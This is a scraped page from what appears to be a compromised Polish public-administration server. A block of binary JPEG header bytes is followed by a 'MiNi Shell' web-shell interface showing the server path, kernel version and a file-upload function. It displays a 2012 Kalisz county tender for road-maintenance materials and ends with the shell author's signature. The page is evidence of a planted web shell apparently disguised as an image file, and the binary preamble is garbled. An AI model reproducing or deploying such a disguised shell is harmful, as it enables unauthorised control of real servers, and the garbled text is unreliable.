JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120224/44667-N-2012.html

<p class="kh_header"><b>Kalisz: Zakup materiałów do bieżącego utrzymania dróg powiatowych z podziałem na trzy zadania</b><br>
<b>Numer ogłoszenia: 44667 - 2012; data zamieszczenia: 24.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kaliski , Plac Św. Józefa 5, 62-800 Kalisz, woj. wielkopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów do bieżącego utrzymania dróg powiatowych z podziałem na trzy zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje sprzedaż i dostawę materiałów do bieżącego utrzymania dróg powiatowych. Materiały te winny spełniać wymogi Polskich Norm. Transport i rozładunek materiałów odbywać się będzie w miejscu wskazanym przez Zamawiającego na terenie Powiatu Kaliskiego. Zamówienie będzie realizowane sukcesywnie, w ilości określonej przez Zamawiającego każdorazowo w zamówieniu, w terminie do 3 dni od dnia złożenia zamówienia przez Zamawiającego. Wielkość zamówienia została określona odpowiednio dla poszczególnych zadań tj.
Zadanie nr 1 - zakup materiałów kanalizacyjnych:
- rura PCV karbowana dwupłaszczowa z kielichem O 500 mm i dł. 6000 mm - 2 szt.
- rura PCV karbowana dwupłaszczowa z kielichem O 400 mm i dł. 6000 mm - 10 szt.
- rura PCV SN 8 O 200 mm i dł. 6000 mm - 70 szt.
- rura PCV SN 8 O 300 mm i dł. 6000 mm - 2 szt.
- wpust uliczny żeliwny ? koła D 400 H 150 wraz z kratką - 60 szt.
- wpust uliczny żeliwny ? koła C 250 H 150 wraz z kratką - 5 szt.
Zadanie nr 2 - zakup materiałów betonowych i cementu
- rura żelbetowa O 500 mm i dł. 1000 mm z dnem oraz otworem i wkładką na rurę 	  PCV O 200 mm - 	   65 szt.
- zwężka betonowa O 1000 mm - 2 szt.
- pokrywa żelbetowa z włazem O 1200 mm - 2 szt.
- ściek betonowy korytkowy 500x500x150 mm - 100 szt.
- bloczki betonowe 380x250x120 mm - 200 szt.
- cement portlandzki CEM I 32,5R - 5 ton
Zadanie nr 3 - zakup kruszywa, soli drogowej oraz mieszanki piasku i soli
- piasek zwykły 0-2mm - 50 ton
- żwir frakcji 2-8mm - 30 ton
- żwir frakcji 16-32mm - 100 ton
- mieszanka kruszywa łamanego kamiennego granitowego lub bazaltowego niesort 0-  31,5 mm - 100 ton
- mieszanka piasku i soli drogowej - 100 ton
- sól drogowa - 3 tony
2.Kod opisujący przedmiot zamówienia, zgodnie z CPV: 44163110-4, 44114220-0, 44114200-4, 14210000-6, 34927100-2.
3.Wykonawca udzieli 12 miesięcznej  gwarancji na przedmiot zamówienia, licząc od dnia każdorazowej dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 7 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.16.31.10-4, 44.11.42.20-0, 44.11.42.00-4, 14.21.00.00-6, 34.92.71.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty (sporządzony wg formularza określonego w Rozdziale 1 specyfikacji istotnych warunków zamówienia), 2. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanowią pełnomocnika do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i przedłożą Zamawiającemu pełnomocnictwo. Pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii. 3.pełnomocnictwo do reprezentowania wykonawcy, zawierające zakres czynności do których uprawnia, jeżeli nie wynika ono z dokumentów o których mowa w pkt III.4) ogłoszenia, Pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii. 4.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego należy przedłożyć atesty, certyfikaty, deklaracje zgodności lub aprobaty techniczne materiałów, 5.Zakres usługi, który zostanie powierzony podwykonawcom (dotyczy przypadku jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> https://pzkalisz.peup.pl/zamowienia.seam?trejId=216<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kaliszu pl. św. Józefa 5, 62-800 Kalisz..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Kaliszu pl. św. Józefa 5, 62-800 Kalisz, kancelaria ogólna pok. 8-9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 - zakup materiałów kanalizacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje sprzedaż i dostawę materiałów do bieżącego utrzymania dróg powiatowych. Materiały te winny spełniać wymogi Polskich Norm. Transport i rozładunek materiałów odbywać się będzie w miejscu wskazanym przez Zamawiającego na terenie Powiatu Kaliskiego. Zamówienie będzie realizowane sukcesywnie, w ilości określonej przez Zamawiającego każdorazowo w zamówieniu, w terminie do 3 dni od dnia złożenia zamówienia przez Zamawiającego. Wielkość zamówienia została określona odpowiednio dla poszczególnych zadań tj.
Zadanie nr 1 - zakup materiałów kanalizacyjnych:
- rura PCV karbowana dwupłaszczowa z kielichem O 500 mm i dł. 6000 mm - 2 szt.
- rura PCV karbowana dwupłaszczowa z kielichem O 400 mm i dł. 6000 mm - 10 szt.
- rura PCV SN 8 O 200 mm i dł. 6000 mm - 70 szt.
- rura PCV SN 8 O 300 mm i dł. 6000 mm - 2 szt.
- wpust uliczny żeliwny ? koła D 400 H 150 wraz z kratką - 60 szt.
- wpust uliczny żeliwny ? koła C 250 H 150 wraz z kratką - 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.16.31.10-4, 44.11.42.20-0, 44.11.42.00-4, 14.21.00.00-6, 34.92.71.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2 - zakup materiałów betonowych i cementu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje sprzedaż i dostawę materiałów do bieżącego utrzymania dróg powiatowych. Materiały te winny spełniać wymogi Polskich Norm. Transport i rozładunek materiałów odbywać się będzie w miejscu wskazanym przez Zamawiającego na terenie Powiatu Kaliskiego. Zamówienie będzie realizowane sukcesywnie, w ilości określonej przez Zamawiającego każdorazowo w zamówieniu, w terminie do 3 dni od dnia złożenia zamówienia przez Zamawiającego. Przewidywana wielkość zamówienia została określona:
Zadanie nr 2 - zakup materiałów betonowych i cementu
- rura żelbetowa O 500 mm i dł. 1000 mm z dnem oraz otworem i wkładką na rurę PCV O 200 mm - 	   65 szt.
- zwężka betonowa O 1000 mm - 2 szt.
- pokrywa żelbetowa z włazem O 1200 mm - 2 szt.
- ściek betonowy korytkowy 500x500x150 mm - 100 szt.
- bloczki betonowe 380x250x120 mm - 200 szt.
- cement portlandzki CEM I 32,5R - 5 ton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.16.31.10-4, 44.11.42.20-0, 44.11.42.00-4, 14.21.00.00-6, 34.92.71.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie nr 3 - zakup kruszywa, soli drogowej oraz mieszanki piasku i soli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje sprzedaż i dostawę materiałów do bieżącego utrzymania dróg powiatowych. Materiały te winny spełniać wymogi Polskich Norm. Transport i rozładunek materiałów odbywać się będzie w miejscu wskazanym przez Zamawiającego na terenie Powiatu Kaliskiego. Zamówienie będzie realizowane sukcesywnie, w ilości określonej przez Zamawiającego każdorazowo w zamówieniu, w terminie do 3 dni od dnia złożenia zamówienia przez Zamawiającego. Przewidywana wielkość zamówienia została określona:
Zadanie nr 3 - zakup kruszywa, soli drogowej oraz mieszanki piasku i soli
- piasek zwykły 0-2mm - 50 ton
- żwir frakcji 2-8mm - 30 ton
- żwir frakcji 16-32mm - 100 ton
- mieszanka kruszywa łamanego kamiennego granitowego lub bazaltowego niesort 0- 31,5 mm - 100 ton
- mieszanka piasku i soli drogowej - 100 ton
- sól drogowa - 3 tony.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.16.31.10-4, 44.11.42.20-0, 44.11.42.00-4, 14.21.00.00-6, 34.92.71.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com